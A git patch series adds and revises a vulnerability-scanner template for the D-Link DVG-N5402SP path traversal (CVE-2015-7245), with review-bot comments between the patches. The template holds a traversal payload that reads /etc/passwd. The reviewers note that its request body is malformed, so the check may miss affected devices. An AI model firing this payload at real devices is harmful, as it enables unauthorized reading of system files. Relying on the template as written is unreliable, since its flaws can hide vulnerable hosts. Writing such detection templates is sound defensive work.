From ca25ff1b391f2b4d5fc62e12dcf507ec20a779fd Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Tue, 16 Aug 2022 11:32:51 +0900
Subject: [PATCH 1/3] Create CVE-2015-7245.yaml

---
 CVE-2015-7245.yaml | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 CVE-2015-7245.yaml

diff --git a/CVE-2015-7245.yaml b/CVE-2015-7245.yaml
new file mode 100644
index 0000000000..28a8b9d1b1
--- /dev/null
+++ b/CVE-2015-7245.yaml
@@ -0,0 +1,29 @@
+id: CVE-2015-7245
+
+info:
+ name: D-Link DVG-N5402SP - Path Traversal
+ author: 0x_Akoko
+ severity: high
+ tags: cve,cve2015,dlink,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-7245
+ cwe-id: CWE-22
+ description: Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
+ reference:
+ - https://www.cvedetails.com/cve/CVE-2015-7245
+ - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/cgibin/webproc"
+
+ body: "getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh"
+
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body

From 20d5d7b7fbcdbea690bce40dbde223c6ee905c97 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 2 Sep 2022 11:20:32 +0530
Subject: [PATCH 2/3] Update and rename CVE-2015-7245.yaml to cves/2015/CVE-2015-7245.yaml

---
 CVE-2015-7245.yaml => cves/2015/CVE-2015-7245.yaml | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)
 rename CVE-2015-7245.yaml => cves/2015/CVE-2015-7245.yaml (91%)
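Review bot: The request body added in PATCH 1/3 names the parameter `*errorpage*`, with literal asterisks, while the description in the same file names the vulnerable parameter as `errorpage`. The asterisks look like emphasis markup carried over from the advisory text; if so, the device never receives the intended parameter and the template will report affected hosts as clean. The same string is carried unchanged into the raw request in PATCH 3/3. Please confirm the exact parameter name against the referenced advisory and, if the asterisks are not part of it, send `errorpage=` instead; the `var%&` fragment in the same body has a dangling percent sign and deserves the same check.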
diff --git a/CVE-2015-7245.yaml b/cves/2015/CVE-2015-7245.yaml
similarity index 91%
rename from CVE-2015-7245.yaml
rename to cves/2015/CVE-2015-7245.yaml
index 28a8b9d1b1..35671e6ab9 100644
--- a/CVE-2015-7245.yaml
+++ b/cves/2015/CVE-2015-7245.yaml
@@ -4,16 +4,18 @@ info:
 name: D-Link DVG-N5402SP - Path Traversal
 author: 0x_Akoko
 severity: high
- tags: cve,cve2015,dlink,lfi
+ description: Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
+ reference:
+ - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
+ - https://www.exploit-db.com/exploits/39409/
+ - https://www.cvedetails.com/cve/CVE-2015-7245
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-7245
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
 cvss-score: 7.5
 cve-id: CVE-2015-7245
 cwe-id: CWE-22
- description: Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
- reference:
- - https://www.cvedetails.com/cve/CVE-2015-7245
- - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
+ tags: cve,cve2015,dlink,lfi

 requests:
 - method: POST

From 41bffb12970c308b92eef19201fe62e598106960 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 2 Sep 2022 11:33:10 +0530
Subject: [PATCH 3/3] Update CVE-2015-7245.yaml

---
 cves/2015/CVE-2015-7245.yaml | 18 ++++++++----------
 1 file changed, 8 insertions(+), 10 deletions(-)

diff --git a/cves/2015/CVE-2015-7245.yaml b/cves/2015/CVE-2015-7245.yaml
index 35671e6ab9..a55e28a577 100644
--- a/cves/2015/CVE-2015-7245.yaml
+++ b/cves/2015/CVE-2015-7245.yaml
@@ -4,28 +4,26 @@ info:
 name: D-Link DVG-N5402SP - Path Traversal
 author: 0x_Akoko
 severity: high
- description: Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
+ description: |
+ Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
 reference:
 - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
 - https://www.exploit-db.com/exploits/39409/
- - https://www.cvedetails.com/cve/CVE-2015-7245
 - https://nvd.nist.gov/vuln/detail/CVE-2015-7245
 classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
 cve-id: CVE-2015-7245
- cwe-id: CWE-22
 tags: cve,cve2015,dlink,lfi

 requests:
- - method: POST
- path:
- - "{{BaseURL}}/cgibin/webproc"
+ - raw:
+ - |
+ POST /cgibin/webproc HTTP/1.1
+ Host: {{Hostname}}

- body: "getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh"
+ getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh

 matchers:
 - type: regex
+ part: body
 regex:
 - "root:.*:0:0:"
- part: body
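Review bot: The raw POST introduced in PATCH 3/3 carries a form-encoded body but declares no `Content-Type`, so whether the target parses the body at all is left to the server's defaults. Adding `Content-Type: application/x-www-form-urlencoded` under the `Host: {{Hostname}}` line makes the check behave the same on every run. The same hunk also removes `cwe-id: CWE-22` and both CVSS fields from `classification` while `severity: high` stays. The description still states a directory traversal, so `cwe-id: CWE-22` remains supported by the page and is worth keeping for triage and filtering, even if the CVSS vector was dropped because it could not be verified.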